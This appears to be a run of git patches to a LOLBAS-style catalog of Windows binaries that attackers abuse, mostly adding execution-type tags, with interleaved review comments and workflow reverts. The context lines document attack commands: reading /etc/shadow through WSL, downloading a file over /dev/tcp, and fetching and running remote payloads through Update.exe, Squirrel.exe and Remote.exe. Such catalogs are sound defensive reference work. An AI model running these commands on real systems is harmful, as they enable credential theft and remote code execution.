+++ b/yml/OtherMSBinaries/OpenConsole.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe From c6753c4b2d869a67c06bbeb530480a85341424ac Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:23:27 +0200 Subject: [PATCH 124/148] Update Rcsi.yml Tags Added Tags: Execute: Csharp --- yml/OtherMSBinaries/Rcsi.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 22d880c4..d39ab320 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Csharp - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Csharp Full_Path: - Path: no default Code_Sample: From fa2ded3a9722171398b235f2b8ae583663c6bde1 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:24:35 +0200 Subject: [PATCH 125/148] Update Remote.yml Tags Added Tags: Execute EXE Execute Remote --- yml/OtherMSBinaries/Remote.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 6ea1d455..cb63fb6b 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml 
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe From 57e5e0d7125adc21c0942d4617ce681c251aebda Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:26:03 +0200 Subject: [PATCH 126/148] Update Sqlps.yml Tags Added Tags: Execute Powershell --- yml/OtherMSBinaries/Sqlps.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 906ca523..aaa583e7 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: Powershell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe From 4df50e3e79bc185dfd0e85bb9fe5dc17c4bb7605 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:26:38 +0200 Subject: [PATCH 127/148] Update Sqltoolsps.yml Tags Added Tags: Execute: Powershell --- yml/OtherMSBinaries/Sqltoolsps.yml | 2 ++ 1 file changed, 2 insertions(+) 
diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index c17ee4a4..44835607 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: Powershell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Code_Sample: From ae12e139df1c89a228ca30335104e817da8512c4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:28:11 +0200 Subject: [PATCH 128/148] Update Squirrel.yml tags Added Tags: Execute Nuget Execute Remote --- yml/OtherMSBinaries/Squirrel.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index 0055ff32..a8207ad9 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --update [url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary 
@@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Squirrel.exe' Code_Sample: From 384d674908419bbe1528f93477911d7056c8a4d4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:29:50 +0200 Subject: [PATCH 129/148] Update Te.yml Tags Added Tags: Execute WSH --- yml/OtherMSBinaries/Te.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 5c3bdb53..d5d0580c 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: WSH - Command: te.exe test.dll Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures. Usecase: Execute DLL file. From ce9d4e59f57db42e12748f13bb9a06b110e6518a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:32:01 +0200 Subject: [PATCH 130/148] Update Teams.yml Tags Added Tags: - Execute: Javascript Execute CMD --- yml/OtherMSBinaries/Teams.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index fffb4b1f..8cfa5433 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml 
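Review bot: The Te.yml hunk tags the `te.exe test.dll` entry as `Execute: WSH`, but the entry's own Description says it executes commands from a DLL file through TAEF tests and its Usecase is "Execute DLL file", and the same series uses `Execute: DLL` for the DLL-loading entry in Coregen.yml. Unless TAEF's script-based test support is what is meant (which the documented command does not show), `- Execute: DLL` is the consistent value; if WSH is intentional, the Description should mention the script path so the tag can be verified against it.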
@@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Javascript - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Usecase: Execute JavaScript code @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Javascript - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Teams.exe' Code_Sample: From 927189f01e9b38a4996092c77900837ef638b5b7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:35:45 +0200 Subject: [PATCH 131/148] Update Update.yml Tags Added Tags: Execute Nuget Execute Remote Execute EXE --- yml/OtherMSBinaries/Update.yml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index f4049a49..c0b51ae3 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary 
@@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -46,6 +58,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -53,6 +68,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass 
@@ -60,6 +78,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -67,6 +88,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -74,6 +98,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary @@ -81,6 +108,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary 
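Review bot: In the `-60,6 +78,9` hunk the added `Tags` block attaches to the first `Update.exe --processStart payload.exe --process-start-args` entry (the one whose Usecase is "Application Whitelisting Bypass"), giving it `Execute: Nuget` and `Execute: Remote`, while the identical second `--processStart` entry later on this line is tagged `Execute: EXE`. Per its Description, `--processStart` runs a file already copied into the local Teams directory and downloads no package, so the first block should be the single item `- Execute: EXE` to match the second. Because every added `Tags` block belongs to the entry above the `- Command:` line that follows it, the remaining Update.yml and Squirrel.yml hunks are worth re-checking for the same one-entry shift.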
@@ -88,6 +117,8 @@ Commands:
 Privileges: User
 MitreID: T1547
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: EXE
 - Command: Update.exe --removeShortcut=payload.exe -l=Startup
 Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
 Usecase: Execute binary
@@ -95,6 +126,8 @@ Commands:
 Privileges: User
 MitreID: T1070
 OperatingSystem: Windows 7 and up with Microsoft Teams installed
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe'
 Code_Sample:
From f080b42594cc7a41a7b22c9c4dfa7c2c0ab37ca6 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:36:35 +0200
Subject: [PATCH 132/148] Update VSDiagnostics.yml Tags Added Tags: Execute EXE
---
 yml/OtherMSBinaries/VSDiagnostics.yml | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml
index 88ccc885..ba2b6ba9 100644
--- a/yml/OtherMSBinaries/VSDiagnostics.yml
+++ b/yml/OtherMSBinaries/VSDiagnostics.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:"/c calc.exe"
 Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.
 Usecase: Proxy execution of binary with arguments
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
 Detection:
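Review bot: The `Tags:` added at `@@ -95,6 +126,8 @@` marks the `--removeShortcut=payload.exe` entry (MitreID T1070, described as removing the Startup shortcut) as `Execute: EXE`, but that command deletes a shortcut and launches nothing, so anyone filtering the catalog by execution type gets a false hit. If the taxonomy has no cleanup/removal tag, leaving this entry untagged is more accurate than `Execute: EXE`; its `Category:` line is outside the hunk, so check that it agrees as well. The `--createShortcut` tagging at `@@ -88,6 +117,8 @@` (T1547) is consistent, since that shortcut does cause an EXE to run at logon.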
From 780b478272e653fbac74c9153e755dc55e75e1a3 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:37:05 +0200
Subject: [PATCH 133/148] Update VSIISExeLauncher.yml Tags Added Tags: Execute EXE
---
 yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml
index 428d7307..86d34a90 100644
--- a/yml/OtherMSBinaries/VSIISExeLauncher.yml
+++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 and up with VS/VScode installed
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
 Code_Sample:
From ed5266d49b00a5ff81536d4633ea327037c7d289 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:42:44 +0200
Subject: [PATCH 134/148] Update VisualUiaVerifyNative.yml Tags Added Tags: Execute .NetObjects
---
 yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
index d3c0b05b..ed919008 100644
--- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
+++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+ Tags:
+ - Execute: .NetObjects
 Full_Path:
 - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe
 - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe
From e0b8769c6d3cc3ec47ffe8288dc3994f62eb3dfb Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:43:58 +0200
Subject: [PATCH 135/148] Update VsLaunchBrowser.yml Tags Added Tags: Execute EXE Execute Remote
---
 yml/OtherMSBinaries/VsLaunchBrowser.yml | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/yml/OtherMSBinaries/VsLaunchBrowser.yml b/yml/OtherMSBinaries/VsLaunchBrowser.yml
index 723ed348..578464cf 100644
--- a/yml/OtherMSBinaries/VsLaunchBrowser.yml
+++ b/yml/OtherMSBinaries/VsLaunchBrowser.yml
@@ -20,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 - Command: VSLaunchBrowser.exe .exe \\Server\Path\file
 Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
 Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process.
@@ -27,6 +29,9 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
+ - Execute: Remote
 Full_Path:
 - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe
 - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe
From d170ef468bfba830222b0ccaae1defcdadb1dde2 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:44:41 +0200
Subject: [PATCH 136/148] Update Vshadow.yml Tags Added Tags: Execute: EXE
---
 yml/OtherMSBinaries/Vshadow.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OtherMSBinaries/Vshadow.yml b/yml/OtherMSBinaries/Vshadow.yml
index 4adf4ff2..36c743df 100644
--- a/yml/OtherMSBinaries/Vshadow.yml
+++ b/yml/OtherMSBinaries/Vshadow.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1127
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Program Files (x86)\Windows Kits\10\bin\\x64\vshadow.exe
 Detection:
From ec0a196f80ef15803f1808effb8a30267b018001 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:45:13 +0200
Subject: [PATCH 137/148] Update Vsjitdebugger.yml Tags Added Tags Execute EXE
---
 yml/OtherMSBinaries/Vsjitdebugger.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml
index 9c983a5d..e6fb2f31 100644
--- a/yml/OtherMSBinaries/Vsjitdebugger.yml
+++ b/yml/OtherMSBinaries/Vsjitdebugger.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: c:\windows\system32\vsjitdebugger.exe
 Code_Sample:
From f428073f996ab33b81014fc7a0479ebd83151259 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:45:53 +0200
Subject: [PATCH 138/148] Update Wfc.yml Tags Added Tags: Execute C#
---
 yml/OtherMSBinaries/Wfc.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml
index e66ddb8f..806df6d0 100644
--- a/yml/OtherMSBinaries/Wfc.yml
+++ b/yml/OtherMSBinaries/Wfc.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
+ Tags:
+ - Execute: Csharp
 Full_Path:
 - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
 Code_Sample:
From 842865cc73847b449c88db687efe1d448e7d3ce6 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:47:32 +0200
Subject: [PATCH 139/148] Update Wsl.yml Tags Added Tags: Execute EXE Execute CMD
---
 yml/OtherMSBinaries/Wsl.yml | 6 ++++++
 1 file changed, 6 insertions(+)
diff --git a/yml/OtherMSBinaries/Wsl.yml b/yml/OtherMSBinaries/Wsl.yml
index e1493d19..11d34d9a 100644
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows Server 2019, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: wsl.exe -u root -e cat /etc/shadow
 Description: Cats /etc/shadow file as root
 Usecase: Performs execution of arbitrary Linux commands as root without need for password.
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows Server 2019, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: wsl.exe --exec bash -c ""
 Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u `) on the default WSL distro (unless stated otherwise using `-d `)
 Usecase: Performs execution of arbitrary Linux commands.
@@ -25,6 +29,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows Server 2019, Windows 11
+ Tags:
+ - Execute: CMD
 - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
 Description: Downloads file from 192.168.1.10
 Usecase: Download file
From cc88242bc9f1ffb07aceec39604f74f4e7c6c6f0 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:48:40 +0200
Subject: [PATCH 140/148] Update winfile.yml Tags Added Tags
---
 yml/OtherMSBinaries/winfile.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OtherMSBinaries/winfile.yml b/yml/OtherMSBinaries/winfile.yml
index f0171ed3..91c83a70 100644
--- a/yml/OtherMSBinaries/winfile.yml
+++ b/yml/OtherMSBinaries/winfile.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Windows\System32\winfile.exe
 - Path: C:\Windows\winfile.exe
From 8e3710a99c6212ba90e6bec80f57e3469dd14f63 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 22:49:46 +0200
Subject: [PATCH 141/148] Update Csi.yml: Syntax error
---
 yml/OtherMSBinaries/Csi.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml
index 939eb1cc..bae245ee 100644
--- a/yml/OtherMSBinaries/Csi.yml
+++ b/yml/OtherMSBinaries/Csi.yml
@@ -11,7 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1127
 OperatingSystem: Windows
- - Execute: Csharp
+ Tags:
+ - Execute: Csharp
 Full_Path:
 - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
 - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
From f06ab897c3c47e9ffe12ccf4933c4ca106bb3c77 Mon Sep 17 00:00:00 2001
From: Hegusung
Date: Sun, 13 Oct 2024 23:12:05 +0200
Subject: [PATCH 142/148] Revert "Update gh-pages.yml" This reverts commit 0e177e7d6e1965abdfa69298db742bf90bc1efa0.
---
 .github/workflows/gh-pages.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml
index b3545131..0e3d285c 100644
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@@ -10,7 +10,7 @@ on:
 jobs:
 build:
 runs-on: ubuntu-latest
- if: ${{ github.event.workflow_run.conclusion == 'success' }}
+ if: ${{ github.event.repository.fork == false && github.event.workflow_run.conclusion == 'success' }}
 steps:
 - uses: actions/checkout@v2
From 0dc5a46a2faafac07862b61b3005043214ecd0e8 Mon Sep 17 00:00:00 2001
From: Hegusung
Date: Sun, 13 Oct 2024 23:12:15 +0200
Subject: [PATCH 143/148] Revert "Update gh-pages.yml" This reverts commit 0795916fba11963fa8b5a77e31a2883cebc567a2.
---
 .github/workflows/gh-pages.yml | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml
index 0e3d285c..d3d3f7e3 100644
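Review bot: The restored condition `if: ${{ github.event.repository.fork == false && github.event.workflow_run.conclusion == 'success' }}` gates the deploy job on where it runs and on the upstream run's result, but not on what triggered that run; a workflow_run job executes in the default-branch context with repository secrets regardless, so if the lint workflow named on the `workflows:` line also runs on pull_request (its "PUSH & PULL REQUEST" name suggests it does), the job holding `secrets.ACTIONS_DEPLOY_KEY` runs after every successful PR lint, including PRs from forks. As far as this hunk shows that is a redundant deploy rather than content injection, since `actions/checkout` in a workflow_run job checks out the default branch, but it is still needless secret exposure and publish churn. Consider additionally requiring `github.event.workflow_run.event == 'push'` so only lint runs for pushed commits trigger publishing. The job's remaining steps are outside the hunk.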
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@@ -2,6 +2,24 @@ name: Update LOLBAS-Project-hegusung.github.io
 on:
 workflow_dispatch:
+ inputs:
+ logLevel:
+ description: 'Log level'
+ required: true
+ default: 'warning'
+ type: choice
+ options:
+ - info
+ - warning
+ - debug
+ tags:
+ description: 'Test scenario tags'
+ required: false
+ type: boolean
+ environment:
+ description: 'Environment to run tests against'
+ type: environment
+ required: true
 workflow_run:
 workflows: ["PUSH & PULL REQUEST - YAML Lint and Schema Validation Checks"]
 types: [completed]
From 3cfdfdc57398e27b0a11c244755ffcbfe12a3df7 Mon Sep 17 00:00:00 2001
From: Hegusung
Date: Sun, 13 Oct 2024 23:12:16 +0200
Subject: [PATCH 144/148] Revert "Update gh-pages.yml" This reverts commit 679b321c343f15bd6ad4e0fe7010ad3dee6593e0.
---
 .github/workflows/gh-pages.yml | 19 -------------------
 1 file changed, 19 deletions(-)
diff --git a/.github/workflows/gh-pages.yml b/.github/workflows/gh-pages.yml
index d3d3f7e3..b053a7c1 100644
--- a/.github/workflows/gh-pages.yml
+++ b/.github/workflows/gh-pages.yml
@@ -1,25 +1,6 @@
 ---
 name: Update LOLBAS-Project-hegusung.github.io
 on:
- workflow_dispatch:
- inputs:
- logLevel:
- description: 'Log level'
- required: true
- default: 'warning'
- type: choice
- options:
- - info
- - warning
- - debug
- tags:
- description: 'Test scenario tags'
- required: false
- type: boolean
- environment:
- description: 'Environment to run tests against'
- type: environment
- required: true
 workflow_run:
